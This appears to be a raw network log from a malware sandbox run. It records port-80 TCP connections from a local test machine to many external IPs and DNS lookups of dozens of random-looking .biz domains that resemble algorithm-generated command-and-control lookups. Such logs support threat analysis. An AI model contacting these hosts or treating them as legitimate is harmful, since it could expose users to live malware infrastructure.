                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:45.904266119 CET5999980192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:45.914047003 CET6000080192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:45.919547081 CET80600003.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:45.919637918 CET6000080192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:45.919753075 CET6000080192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:45.919776917 CET6000080192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:45.925363064 CET80600003.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:45.925460100 CET80600003.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:46.585510969 CET80600003.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:46.585798979 CET6000080192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:46.593625069 CET80600003.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:46.593727112 CET6000080192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:46.606997967 CET6000180192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:46.612437963 CET806000135.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:46.612579107 CET6000180192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:46.612720013 CET6000180192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:46.612736940 CET6000180192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:46.618555069 CET806000135.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:46.618626118 CET806000135.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:47.453248024 CET806000135.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:47.460289955 CET6000180192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:47.466682911 CET806000135.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:47.466779947 CET6000180192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:47.493984938 CET6000280192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:47.500114918 CET806000218.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:47.500196934 CET6000280192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:47.504612923 CET6000280192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:47.504640102 CET6000280192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:47.509975910 CET806000218.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:47.510032892 CET806000218.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:48.176425934 CET806000218.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:48.176630974 CET6000280192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:48.182377100 CET806000218.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:48.182435036 CET6000280192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:48.199178934 CET6000380192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:48.204690933 CET806000354.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:48.204771042 CET6000380192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:48.204962969 CET6000380192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:48.204989910 CET6000380192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:48.210397959 CET806000354.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:48.210429907 CET806000354.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:49.085321903 CET806000354.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:49.104063034 CET6000380192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:49.110905886 CET806000354.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:49.110970974 CET6000380192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:49.121555090 CET6000480192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:55.917431116 CET8060010172.234.222.143192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:55.953800917 CET6001180192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:55.959202051 CET806001118.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:55.959275961 CET6001180192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:55.959419012 CET6001180192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:55.959434032 CET6001180192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:55.964767933 CET806001118.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:55.964819908 CET806001118.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:57.789963007 CET806001118.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:57.789998055 CET806001118.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:57.790080070 CET6001180192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:57.790224075 CET6001180192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:57.804784060 CET806001118.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:57.804858923 CET6001180192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:57.830080986 CET6001280192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:57.835583925 CET806001282.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:57.835674047 CET6001280192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:57.835853100 CET6001280192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:57.835887909 CET6001280192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:57.842160940 CET806001282.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:57.842190027 CET806001282.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:53:06.343703032 CET806001282.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:53:06.343871117 CET6001280192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:53:06.343954086 CET6001280192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:53:06.349351883 CET806001282.112.184.197192.168.2.5
Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:51.228598118 CET53650141.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:52.189018011 CET6339353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:52.197299957 CET53633931.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:53.309561014 CET5140153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:53.317384005 CET53514011.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:55.282622099 CET6073553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:55.290446997 CET53607351.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:56.291156054 CET5853153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:56.299453020 CET53585311.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:57.448195934 CET5091453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:57.459569931 CET53509141.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:58.583786964 CET6126753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:58.592896938 CET53612671.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:59.360500097 CET5668353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:59.370845079 CET53566831.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:00.736924887 CET5589853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:00.744595051 CET53558981.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:01.847632885 CET5507553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:01.861124992 CET53550751.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:02.706526041 CET6264253192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:02.853996992 CET53626421.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:04.133127928 CET5755353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:04.141012907 CET53575531.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:05.247001886 CET6290553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:05.255964994 CET53629051.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:07.026309967 CET6166553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:07.037302017 CET53616651.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:08.184406042 CET6317353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:08.192347050 CET53631731.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:09.505151987 CET5866953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:09.514775991 CET53586691.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:11.115056038 CET5440253192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:11.123327017 CET53544021.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:11.124059916 CET4916053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:11.133649111 CET53491601.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:12.376104116 CET6095753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:12.384679079 CET53609571.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:13.751931906 CET6168053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:13.760292053 CET53616801.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:15.451435089 CET4933153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:15.459930897 CET53493311.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:16.915152073 CET6487753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:17.120539904 CET53648771.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:19.038057089 CET5544753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:19.046371937 CET53554471.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:20.667340040 CET5174753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:20.676110983 CET53517471.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:22.145462990 CET6294553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:22.339181900 CET53629451.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:23.200151920 CET5536053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:23.208785057 CET53553601.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:24.171866894 CET5972653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:24.180802107 CET53597261.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:25.040499926 CET6128553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:25.051558018 CET53612851.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:26.042457104 CET5735853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:26.050436020 CET53573581.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:26.964453936 CET5237453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:26.973980904 CET53523741.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:28.446038008 CET6494153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:04.187935114 CET53523081.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:04.878850937 CET5011053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:04.888478041 CET53501101.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:05.732358932 CET6343253192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:05.741265059 CET53634321.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:06.681616068 CET6156753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:06.709644079 CET6156753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:06.875269890 CET53615671.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:06.875370026 CET53615671.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:07.869496107 CET5513153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:07.879863024 CET53551311.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:08.791812897 CET5172753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:08.800915003 CET53517271.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:10.249466896 CET6235153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:10.272289991 CET6235153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:10.346066952 CET53623511.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:10.346221924 CET53623511.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:11.838620901 CET5708853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:11.847137928 CET53570881.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:12.525034904 CET4971153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:12.534884930 CET53497111.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:13.224611044 CET5240653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:13.240909100 CET5240653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:13.324201107 CET53524061.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:13.324506044 CET53524061.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:14.000179052 CET4971153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:14.008375883 CET53497111.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:15.882416964 CET5823553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:15.891592979 CET53582351.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:16.572091103 CET5403853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:16.580157042 CET53540381.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:17.429893970 CET5271453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:17.437978029 CET53527141.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:18.273001909 CET4998553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:18.281899929 CET53499851.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:20.085882902 CET6279653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:20.094315052 CET53627961.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:21.534456968 CET5554553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:21.543230057 CET53555451.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:22.220501900 CET5108353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:22.228643894 CET53510831.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:22.909151077 CET6218753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:22.917493105 CET53621871.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:24.367496014 CET6125153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:24.397169113 CET6125153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:24.738147974 CET53612511.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:24.738199949 CET53612511.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:26.183563948 CET5437353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:26.191303015 CET53543731.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:26.885880947 CET5239553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:26.894248962 CET53523951.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:29.265113115 CET5245553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:29.274249077 CET53524551.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:30.286562920 CET6161853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:30.297322989 CET53616181.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:31.717844963 CET5433053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:31.725974083 CET53543301.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:32.565366983 CET6180953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:32.584656000 CET6180953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:32.592679024 CET53618091.1.1.1192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:04.596829891 CET192.168.2.51.1.1.10x6bfbStandard query (0)przvgke.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:06.147089005 CET192.168.2.51.1.1.10x985aStandard query (0)zlenh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:06.156759977 CET192.168.2.51.1.1.10xe1f5Standard query (0)knjghuig.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:07.680524111 CET192.168.2.51.1.1.10x93eaStandard query (0)uhxqin.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:07.690089941 CET192.168.2.51.1.1.10xa22cStandard query (0)anpmnmxo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:07.707196951 CET192.168.2.51.1.1.10x76cStandard query (0)lpuegx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:24.868803024 CET192.168.2.51.1.1.10x823aStandard query (0)vjaxhpbji.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:41.970679998 CET192.168.2.51.1.1.10xc051Standard query (0)xlfhhhm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:43.751815081 CET192.168.2.51.1.1.10x4390Standard query (0)ifsaia.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:45.692521095 CET192.168.2.51.1.1.10x6f45Standard query (0)saytjshyf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:46.600362062 CET192.168.2.51.1.1.10xca64Standard query (0)vcddkls.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:48.354352951 CET192.168.2.51.1.1.10x290Standard query (0)fwiwk.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:49.995340109 CET192.168.2.51.1.1.10x55b6Standard query (0)tbjrpv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:51.219710112 CET192.168.2.51.1.1.10xfe03Standard query (0)deoci.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:52.189018011 CET192.168.2.51.1.1.10x62eeStandard query (0)gytujflc.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:53.309561014 CET192.168.2.51.1.1.10xd361Standard query (0)qaynky.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:55.282622099 CET192.168.2.51.1.1.10x28cStandard query (0)bumxkqgxu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:56.291156054 CET192.168.2.51.1.1.10xa259Standard query (0)dwrqljrr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:57.448195934 CET192.168.2.51.1.1.10x75a0Standard query (0)nqwjmb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:58.583786964 CET192.168.2.51.1.1.10x11f5Standard query (0)ytctnunms.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:59.360500097 CET192.168.2.51.1.1.10x14e9Standard query (0)myups.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:00.736924887 CET192.168.2.51.1.1.10x4e52Standard query (0)oshhkdluh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:01.847632885 CET192.168.2.51.1.1.10xdf55Standard query (0)yunalwv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:02.706526041 CET192.168.2.51.1.1.10x4171Standard query (0)jpskm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:04.133127928 CET192.168.2.51.1.1.10x7839Standard query (0)lrxdmhrr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:05.247001886 CET192.168.2.51.1.1.10xd1f6Standard query (0)wllvnzb.bizA (IP address)IN (0x0001)false
